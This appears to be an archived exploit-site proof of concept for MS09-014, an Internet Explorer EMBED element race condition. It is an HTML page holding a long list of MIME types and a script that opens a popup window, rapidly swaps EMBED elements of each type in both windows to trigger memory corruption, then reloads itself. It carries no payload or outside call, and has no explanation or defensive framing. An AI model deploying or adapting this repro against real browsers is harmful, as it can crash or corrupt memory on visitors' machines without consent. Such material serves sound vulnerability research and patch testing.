669 lines
No EOL
16 KiB
HTML
669 lines
No EOL
16 KiB
HTML
<BODY onload=go()></BODY>
|
|
<!--
|
|
MS09-014: MSIE EMBED element race condition memory corruption
|
|
Code by SkyLined <berendjanwever@gmail.com>
|
|
http://skypher.com/SkyLined/Repro/MSIE/EMBED%20memory%20corruption/repro3.html
|
|
http://skypher.com/index.php/2009/04/19/ms09-014-embed-element-memory-corruption
|
|
-->
|
|
<SCRIPT>
|
|
var asMimeTypes = [
|
|
"x-world/x-3dmf",
|
|
"x-world/x-3dmf",
|
|
"application/octet-stream",
|
|
"application/x-authorware-bin",
|
|
"application/x-authorware-map",
|
|
"application/x-authorware-seg",
|
|
"text/vnd.abc",
|
|
"text/html",
|
|
"video/animaflex",
|
|
"application/postscript",
|
|
"audio/aiff",
|
|
"audio/x-aiff",
|
|
"audio/aiff",
|
|
"audio/x-aiff",
|
|
"audio/aiff",
|
|
"audio/x-aiff",
|
|
"application/x-aim",
|
|
"text/x-audiosoft-intra",
|
|
"application/x-navi-animation",
|
|
"application/x-nokia-9000-communicator-add-on-software",
|
|
"application/mime",
|
|
"application/octet-stream",
|
|
"application/arj",
|
|
"application/octet-stream",
|
|
"image/x-jg",
|
|
"video/x-ms-asf",
|
|
"text/x-asm",
|
|
"text/asp",
|
|
"application/x-mplayer2",
|
|
"video/x-ms-asf",
|
|
"video/x-ms-asf-plugin",
|
|
"audio/basic",
|
|
"audio/x-au",
|
|
"application/x-troff-msvideo",
|
|
"video/avi",
|
|
"video/msvideo",
|
|
"video/x-msvideo",
|
|
"video/avs-video",
|
|
"application/x-bcpio",
|
|
"application/mac-binary",
|
|
"application/macbinary",
|
|
"application/octet-stream",
|
|
"application/x-binary",
|
|
"application/x-macbinary",
|
|
"image/bmp",
|
|
"image/bmp",
|
|
"image/x-windows-bmp",
|
|
"application/book",
|
|
"application/book",
|
|
"application/x-bzip2",
|
|
"application/x-bsh",
|
|
"application/x-bzip",
|
|
"application/x-bzip2",
|
|
"text/plain",
|
|
"text/x-c",
|
|
"text/plain",
|
|
"application/vnd.ms-pki.seccat",
|
|
"text/plain",
|
|
"text/x-c",
|
|
"application/clariscad",
|
|
"application/x-cocoa",
|
|
"application/cdf",
|
|
"application/x-cdf",
|
|
"application/x-netcdf",
|
|
"application/pkix-cert",
|
|
"application/x-x509-ca-cert",
|
|
"application/x-chat",
|
|
"application/x-chat",
|
|
"application/java",
|
|
"application/java-byte-code",
|
|
"application/x-java-class",
|
|
"application/octet-stream",
|
|
"text/plain",
|
|
"text/plain",
|
|
"application/x-cpio",
|
|
"text/x-c",
|
|
"application/mac-compactpro",
|
|
"application/x-compactpro",
|
|
"application/x-cpt",
|
|
"application/pkcs-crl",
|
|
"application/pkix-crl",
|
|
"application/pkix-cert",
|
|
"application/x-x509-ca-cert",
|
|
"application/x-x509-user-cert",
|
|
"application/x-csh",
|
|
"text/x-script.csh",
|
|
"application/x-pointplus",
|
|
"text/css",
|
|
"text/plain",
|
|
"application/x-director",
|
|
"application/x-deepv",
|
|
"text/plain",
|
|
"application/x-x509-ca-cert",
|
|
"video/x-dv",
|
|
"application/x-director",
|
|
"video/dl",
|
|
"video/x-dl",
|
|
"application/msword",
|
|
"application/msword",
|
|
"application/commonground",
|
|
"application/drafting",
|
|
"application/octet-stream",
|
|
"video/x-dv",
|
|
"application/x-dvi",
|
|
"drawing/x-dwf (old)",
|
|
"model/vnd.dwf",
|
|
"application/acad",
|
|
"image/vnd.dwg",
|
|
"image/x-dwg",
|
|
"application/dxf",
|
|
"image/vnd.dwg",
|
|
"image/x-dwg",
|
|
"application/x-director",
|
|
"text/x-script.elisp",
|
|
"application/x-bytecode.elisp (compiled elisp)",
|
|
"application/x-elc",
|
|
"application/x-envoy",
|
|
"application/postscript",
|
|
"application/x-esrehber",
|
|
"text/x-setext",
|
|
"application/envoy",
|
|
"application/x-envoy",
|
|
"application/octet-stream",
|
|
"text/plain",
|
|
"text/x-fortran",
|
|
"text/x-fortran",
|
|
"text/plain",
|
|
"text/x-fortran",
|
|
"application/vnd.fdf",
|
|
"application/fractals",
|
|
"image/fif",
|
|
"video/fli",
|
|
"video/x-fli",
|
|
"image/florian",
|
|
"text/vnd.fmi.flexstor",
|
|
"video/x-atomic3d-feature",
|
|
"text/plain",
|
|
"text/x-fortran",
|
|
"image/vnd.fpx",
|
|
"image/vnd.net-fpx",
|
|
"application/freeloader",
|
|
"audio/make",
|
|
"text/plain",
|
|
"image/g3fax",
|
|
"image/gif",
|
|
"video/gl",
|
|
"video/x-gl",
|
|
"audio/x-gsm",
|
|
"audio/x-gsm",
|
|
"application/x-gsp",
|
|
"application/x-gss",
|
|
"application/x-gtar",
|
|
"application/x-compressed",
|
|
"application/x-gzip",
|
|
"application/x-gzip",
|
|
"multipart/x-gzip",
|
|
"text/plain",
|
|
"text/x-h",
|
|
"application/x-hdf",
|
|
"application/x-helpfile",
|
|
"application/vnd.hp-hpgl",
|
|
"text/plain",
|
|
"text/x-h",
|
|
"text/x-script",
|
|
"application/hlp",
|
|
"application/x-helpfile",
|
|
"application/x-winhelp",
|
|
"application/vnd.hp-hpgl",
|
|
"application/vnd.hp-hpgl",
|
|
"application/binhex",
|
|
"application/binhex4",
|
|
"application/mac-binhex",
|
|
"application/mac-binhex40",
|
|
"application/x-binhex40",
|
|
"application/x-mac-binhex40",
|
|
"application/hta",
|
|
"text/x-component",
|
|
"text/html",
|
|
"text/html",
|
|
"text/html",
|
|
"text/webviewhtml",
|
|
"text/html",
|
|
"x-conference/x-cooltalk",
|
|
"image/x-icon",
|
|
"text/plain",
|
|
"image/ief",
|
|
"image/ief",
|
|
"application/iges",
|
|
"model/iges",
|
|
"application/iges",
|
|
"model/iges",
|
|
"application/x-ima",
|
|
"application/x-httpd-imap",
|
|
"application/inf",
|
|
"application/x-internett-signup",
|
|
"application/x-ip2",
|
|
"video/x-isvideo",
|
|
"audio/it",
|
|
"application/x-inventor",
|
|
"i-world/i-vrml",
|
|
"application/x-livescreen",
|
|
"audio/x-jam",
|
|
"text/plain",
|
|
"text/x-java-source",
|
|
"text/plain",
|
|
"text/x-java-source",
|
|
"application/x-java-commerce",
|
|
"image/jpeg",
|
|
"image/pjpeg",
|
|
"image/jpeg",
|
|
"image/jpeg",
|
|
"image/pjpeg",
|
|
"image/jpeg",
|
|
"image/pjpeg",
|
|
"image/jpeg",
|
|
"image/pjpeg",
|
|
"image/x-jps",
|
|
"application/x-javascript",
|
|
"image/jutvision",
|
|
"audio/midi",
|
|
"music/x-karaoke",
|
|
"application/x-ksh",
|
|
"text/x-script.ksh",
|
|
"audio/nspaudio",
|
|
"audio/x-nspaudio",
|
|
"audio/x-liveaudio",
|
|
"application/x-latex",
|
|
"application/lha",
|
|
"application/octet-stream",
|
|
"application/x-lha",
|
|
"application/octet-stream",
|
|
"text/plain",
|
|
"audio/nspaudio",
|
|
"audio/x-nspaudio",
|
|
"text/plain",
|
|
"application/x-lisp",
|
|
"text/x-script.lisp",
|
|
"text/plain",
|
|
"text/x-la-asf",
|
|
"application/x-latex",
|
|
"application/octet-stream",
|
|
"application/x-lzh",
|
|
"application/lzx",
|
|
"application/octet-stream",
|
|
"application/x-lzx",
|
|
"text/plain",
|
|
"text/x-m",
|
|
"video/mpeg",
|
|
"audio/mpeg",
|
|
"video/mpeg",
|
|
"audio/x-mpequrl",
|
|
"application/x-troff-man",
|
|
"application/x-navimap",
|
|
"text/plain",
|
|
"application/mbedlet",
|
|
"application/x-magic-cap-package-1.0",
|
|
"application/mcad",
|
|
"application/x-mathcad",
|
|
"image/vasa",
|
|
"text/mcf",
|
|
"application/netmc",
|
|
"application/x-troff-me",
|
|
"message/rfc822",
|
|
"message/rfc822",
|
|
"application/x-midi",
|
|
"audio/midi",
|
|
"audio/x-mid",
|
|
"audio/x-midi",
|
|
"music/crescendo",
|
|
"x-music/x-midi",
|
|
"application/x-midi",
|
|
"audio/midi",
|
|
"audio/x-mid",
|
|
"audio/x-midi",
|
|
"music/crescendo",
|
|
"x-music/x-midi",
|
|
"application/x-frame",
|
|
"application/x-mif",
|
|
"message/rfc822",
|
|
"www/mime",
|
|
"audio/x-vnd.audioexplosion.mjuicemediafile",
|
|
"video/x-motion-jpeg",
|
|
"application/base64",
|
|
"application/x-meme",
|
|
"application/base64",
|
|
"audio/mod",
|
|
"audio/x-mod",
|
|
"video/quicktime",
|
|
"video/quicktime",
|
|
"video/x-sgi-movie",
|
|
"audio/mpeg",
|
|
"audio/x-mpeg",
|
|
"video/mpeg",
|
|
"video/x-mpeg",
|
|
"video/x-mpeq2a",
|
|
"audio/mpeg3",
|
|
"audio/x-mpeg-3",
|
|
"video/mpeg",
|
|
"video/x-mpeg",
|
|
"audio/mpeg",
|
|
"video/mpeg",
|
|
"application/x-project",
|
|
"video/mpeg",
|
|
"video/mpeg",
|
|
"audio/mpeg",
|
|
"video/mpeg",
|
|
"audio/mpeg",
|
|
"application/vnd.ms-project",
|
|
"application/x-project",
|
|
"application/x-project",
|
|
"application/x-project",
|
|
"application/marc",
|
|
"application/x-troff-ms",
|
|
"video/x-sgi-movie",
|
|
"audio/make",
|
|
"application/x-vnd.audioexplosion.mzz",
|
|
"image/naplps",
|
|
"image/naplps",
|
|
"application/x-netcdf",
|
|
"application/vnd.nokia.configuration-message",
|
|
"image/x-niff",
|
|
"image/x-niff",
|
|
"application/x-mix-transfer",
|
|
"application/x-conference",
|
|
"application/x-navidoc",
|
|
"application/octet-stream",
|
|
"application/oda",
|
|
"application/x-omc",
|
|
"application/x-omcdatamaker",
|
|
"application/x-omcregerator",
|
|
"text/x-pascal",
|
|
"application/pkcs10",
|
|
"application/x-pkcs10",
|
|
"application/pkcs-12",
|
|
"application/x-pkcs12",
|
|
"application/x-pkcs7-signature",
|
|
"application/pkcs7-mime",
|
|
"application/x-pkcs7-mime",
|
|
"application/pkcs7-mime",
|
|
"application/x-pkcs7-mime",
|
|
"application/x-pkcs7-certreqresp",
|
|
"application/pkcs7-signature",
|
|
"application/pro_eng",
|
|
"text/pascal",
|
|
"image/x-portable-bitmap",
|
|
"application/vnd.hp-pcl",
|
|
"application/x-pcl",
|
|
"image/x-pict",
|
|
"image/x-pcx",
|
|
"chemical/x-pdb",
|
|
"application/pdf",
|
|
"audio/make",
|
|
"audio/make.my.funk",
|
|
"image/x-portable-graymap",
|
|
"image/x-portable-greymap",
|
|
"image/pict",
|
|
"image/pict",
|
|
"application/x-newton-compatible-pkg",
|
|
"application/vnd.ms-pki.pko",
|
|
"text/plain",
|
|
"text/x-script.perl",
|
|
"application/x-pixclscript",
|
|
"image/x-xpixmap",
|
|
"text/x-script.perl-module",
|
|
"application/x-pagemaker",
|
|
"application/x-pagemaker",
|
|
"image/png",
|
|
"application/x-portable-anymap",
|
|
"image/x-portable-anymap",
|
|
"application/mspowerpoint",
|
|
"application/vnd.ms-powerpoint",
|
|
"model/x-pov",
|
|
"application/vnd.ms-powerpoint",
|
|
"image/x-portable-pixmap",
|
|
"application/mspowerpoint",
|
|
"application/vnd.ms-powerpoint",
|
|
"application/mspowerpoint",
|
|
"application/powerpoint",
|
|
"application/vnd.ms-powerpoint",
|
|
"application/x-mspowerpoint",
|
|
"application/mspowerpoint",
|
|
"application/x-freelance",
|
|
"application/pro_eng",
|
|
"application/postscript",
|
|
"application/octet-stream",
|
|
"paleovu/x-pv",
|
|
"application/vnd.ms-powerpoint",
|
|
"text/x-script.phyton",
|
|
"applicaiton/x-bytecode.python",
|
|
"audio/vnd.qcelp",
|
|
"x-world/x-3dmf",
|
|
"x-world/x-3dmf",
|
|
"image/x-quicktime",
|
|
"video/quicktime",
|
|
"video/x-qtc",
|
|
"image/x-quicktime",
|
|
"image/x-quicktime",
|
|
"audio/x-pn-realaudio",
|
|
"audio/x-pn-realaudio-plugin",
|
|
"audio/x-realaudio",
|
|
"audio/x-pn-realaudio",
|
|
"application/x-cmu-raster",
|
|
"image/cmu-raster",
|
|
"image/x-cmu-raster",
|
|
"image/cmu-raster",
|
|
"text/x-script.rexx",
|
|
"image/vnd.rn-realflash",
|
|
"image/x-rgb",
|
|
"application/vnd.rn-realmedia",
|
|
"audio/x-pn-realaudio",
|
|
"audio/mid",
|
|
"audio/x-pn-realaudio",
|
|
"audio/x-pn-realaudio",
|
|
"audio/x-pn-realaudio-plugin",
|
|
"application/ringing-tones",
|
|
"application/vnd.nokia.ringing-tone",
|
|
"application/vnd.rn-realplayer",
|
|
"application/x-troff",
|
|
"image/vnd.rn-realpix",
|
|
"audio/x-pn-realaudio-plugin",
|
|
"text/richtext",
|
|
"text/vnd.rn-realtext",
|
|
"application/rtf",
|
|
"application/x-rtf",
|
|
"text/richtext",
|
|
"application/rtf",
|
|
"text/richtext",
|
|
"video/vnd.rn-realvideo",
|
|
"text/x-asm",
|
|
"audio/s3m",
|
|
"application/octet-stream",
|
|
"application/x-tbook",
|
|
"application/x-lotusscreencam",
|
|
"text/x-script.guile",
|
|
"text/x-script.scheme",
|
|
"video/x-scm",
|
|
"text/plain",
|
|
"application/sdp",
|
|
"application/x-sdp",
|
|
"application/sounder",
|
|
"application/sea",
|
|
"application/x-sea",
|
|
"application/set",
|
|
"text/sgml",
|
|
"text/x-sgml",
|
|
"text/sgml",
|
|
"text/x-sgml",
|
|
"application/x-bsh",
|
|
"application/x-sh",
|
|
"application/x-shar",
|
|
"text/x-script.sh",
|
|
"application/x-bsh",
|
|
"application/x-shar",
|
|
"text/html",
|
|
"text/x-server-parsed-html",
|
|
"audio/x-psid",
|
|
"application/x-sit",
|
|
"application/x-stuffit",
|
|
"application/x-koan",
|
|
"application/x-koan",
|
|
"application/x-koan",
|
|
"application/x-koan",
|
|
"application/x-seelogo",
|
|
"application/smil",
|
|
"application/smil",
|
|
"audio/basic",
|
|
"audio/x-adpcm",
|
|
"application/solids",
|
|
"application/x-pkcs7-certificates",
|
|
"text/x-speech",
|
|
"application/futuresplash",
|
|
"application/x-sprite",
|
|
"application/x-sprite",
|
|
"application/x-wais-source",
|
|
"text/x-server-parsed-html",
|
|
"application/streamingmedia",
|
|
"application/vnd.ms-pki.certstore",
|
|
"application/step",
|
|
"application/sla",
|
|
"application/vnd.ms-pki.stl",
|
|
"application/x-navistyle",
|
|
"application/step",
|
|
"application/x-sv4cpio",
|
|
"application/x-sv4crc",
|
|
"image/vnd.dwg",
|
|
"image/x-dwg",
|
|
"application/x-world",
|
|
"x-world/x-svr",
|
|
"application/x-shockwave-flash",
|
|
"application/x-troff",
|
|
"text/x-speech",
|
|
"application/x-tar",
|
|
"application/toolbook",
|
|
"application/x-tbook",
|
|
"application/x-tcl",
|
|
"text/x-script.tcl",
|
|
"text/x-script.tcsh",
|
|
"application/x-tex",
|
|
"application/x-texinfo",
|
|
"application/x-texinfo",
|
|
"application/plain",
|
|
"text/plain",
|
|
"application/gnutar",
|
|
"application/x-compressed",
|
|
"image/tiff",
|
|
"image/x-tiff",
|
|
"image/tiff",
|
|
"image/x-tiff",
|
|
"application/x-troff",
|
|
"audio/tsp-audio",
|
|
"application/dsptype",
|
|
"audio/tsplayer",
|
|
"text/tab-separated-values",
|
|
"image/florian",
|
|
"text/plain",
|
|
"text/x-uil",
|
|
"text/uri-list",
|
|
"text/uri-list",
|
|
"application/i-deas",
|
|
"text/uri-list",
|
|
"text/uri-list",
|
|
"application/x-ustar",
|
|
"multipart/x-ustar",
|
|
"application/octet-stream",
|
|
"text/x-uuencode",
|
|
"text/x-uuencode",
|
|
"application/x-cdlink",
|
|
"text/x-vcalendar",
|
|
"application/vda",
|
|
"video/vdo",
|
|
"application/groupwise",
|
|
"video/vivo",
|
|
"video/vnd.vivo",
|
|
"video/vivo",
|
|
"video/vnd.vivo",
|
|
"application/vocaltec-media-desc",
|
|
"application/vocaltec-media-file",
|
|
"audio/voc",
|
|
"audio/x-voc",
|
|
"video/vosaic",
|
|
"audio/voxware",
|
|
"audio/x-twinvq-plugin",
|
|
"audio/x-twinvq",
|
|
"audio/x-twinvq-plugin",
|
|
"application/x-vrml",
|
|
"model/vrml",
|
|
"x-world/x-vrml",
|
|
"x-world/x-vrt",
|
|
"application/x-visio",
|
|
"application/x-visio",
|
|
"application/x-visio",
|
|
"application/wordperfect6.0",
|
|
"application/wordperfect6.1",
|
|
"application/msword",
|
|
"audio/wav",
|
|
"audio/x-wav",
|
|
"application/x-qpro",
|
|
"image/vnd.wap.wbmp",
|
|
"application/vnd.xara",
|
|
"application/msword",
|
|
"application/x-123",
|
|
"windows/metafile",
|
|
"text/vnd.wap.wml",
|
|
"application/vnd.wap.wmlc",
|
|
"text/vnd.wap.wmlscript",
|
|
"application/vnd.wap.wmlscriptc",
|
|
"application/msword",
|
|
"application/wordperfect",
|
|
"application/wordperfect",
|
|
"application/wordperfect6.0",
|
|
"application/wordperfect",
|
|
"application/wordperfect",
|
|
"application/x-wpwin",
|
|
"application/x-lotus",
|
|
"application/mswrite",
|
|
"application/x-wri",
|
|
"application/x-world",
|
|
"model/vrml",
|
|
"x-world/x-vrml",
|
|
"model/vrml",
|
|
"x-world/x-vrml",
|
|
"text/scriplet",
|
|
"application/x-wais-source",
|
|
"application/x-wintalk",
|
|
"image/x-xbitmap",
|
|
"image/x-xbm",
|
|
"image/xbm",
|
|
"video/x-amt-demorun",
|
|
"xgl/drawing",
|
|
"image/vnd.xiff",
|
|
"application/excel",
|
|
"application/excel",
|
|
"application/x-excel",
|
|
"application/x-msexcel",
|
|
"application/excel",
|
|
"application/vnd.ms-excel",
|
|
"application/x-excel",
|
|
"application/excel",
|
|
"application/vnd.ms-excel",
|
|
"application/x-excel",
|
|
"application/excel",
|
|
"application/x-excel",
|
|
"application/excel",
|
|
"application/x-excel",
|
|
"application/excel",
|
|
"application/vnd.ms-excel",
|
|
"application/x-excel",
|
|
"application/excel",
|
|
"application/vnd.ms-excel",
|
|
"application/x-excel",
|
|
"application/excel",
|
|
"application/vnd.ms-excel",
|
|
"application/x-excel",
|
|
"application/x-msexcel",
|
|
"application/excel",
|
|
"application/x-excel",
|
|
"application/excel",
|
|
"application/x-excel",
|
|
"application/excel",
|
|
"application/vnd.ms-excel",
|
|
"application/x-excel",
|
|
"application/x-msexcel",
|
|
"audio/xm",
|
|
"application/xml",
|
|
"text/xml",
|
|
"xgl/movie",
|
|
"application/x-vnd.ls-xpix",
|
|
"image/x-xpixmap",
|
|
"image/xpm",
|
|
"image/png",
|
|
"video/x-amt-showrun",
|
|
"image/x-xwd",
|
|
"image/x-xwindowdump",
|
|
"chemical/x-pdb",
|
|
"application/x-compress",
|
|
"application/x-compressed",
|
|
"application/x-compressed",
|
|
"application/x-zip-compressed",
|
|
"application/zip",
|
|
"multipart/x-zip",
|
|
"application/octet-stream",
|
|
"text/x-script.zsh"
|
|
];
|
|
var oWindow = window.open();
|
|
function go() {
|
|
if (oWindow == null) {
|
|
document.body.innerHTML = "Please disable your popup blocker.";
|
|
} else if (asMimeTypes.length > 0) {
|
|
document.body.innerHTML = "Testing mime type " + asMimeTypes[0] + "...<embed type='" + asMimeTypes.shift() + "'></embed>";
|
|
oWindow.document.body.innerHTML = "Testing mime type " + asMimeTypes[0] + "...<embed type='" + asMimeTypes.shift() + "'></embed>"
|
|
setTimeout(go, 1);
|
|
} else {
|
|
oWindow.close();
|
|
document.body.innerHTML = "You appear not to be vulnerable, trying again...";
|
|
location.reload();
|
|
}
|
|
}
|
|
</SCRIPT>
|
|
|
|
# milw0rm.com [2009-04-20] |